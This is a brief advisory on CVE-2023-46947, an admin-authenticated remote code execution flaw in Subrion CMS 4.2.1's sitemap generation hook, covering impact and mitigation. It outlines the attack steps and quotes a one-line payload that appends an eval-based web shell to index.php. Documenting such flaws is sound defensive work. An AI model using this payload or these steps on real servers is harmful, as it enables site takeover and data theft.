CVE-2023-46947

Subrion CMS version 4.2.1 contains a remote command execution vulnerability in the backend. The root cause is insufficient input validation in the sitemap generation hook, allowing authenticated users with administrative privileges to write arbitrary PHP code into website files. [1][2]

The attack requires backend access (admin credentials). After login, the attacker retrieves the server's absolute path via the System module's PHP info page. Then, in the Hooks section of the System module, they edit the 'sitemapGeneration' hook and inject a payload such as fputs(fopen('.../index.php','a+'),'@eval($_GET[cmd]);');. When the 'Generate Sitemap' function is executed, the malicious code is written into the website's homepage, and the subsequent syntax check triggers execution of the injected code. [2]

Successful exploitation grants the attacker arbitrary command execution on the server, effectively compromising the entire web application. This can lead to data theft, further lateral movement, or complete site takeover. [1][2]

As of the advisory, the vendor has not released a patch. The recommended mitigation is to apply strict input filtering on hook content and restrict admin access. Users should consider upgrading to a newer version if available, or implement web application firewall rules to block malicious payloads. [2]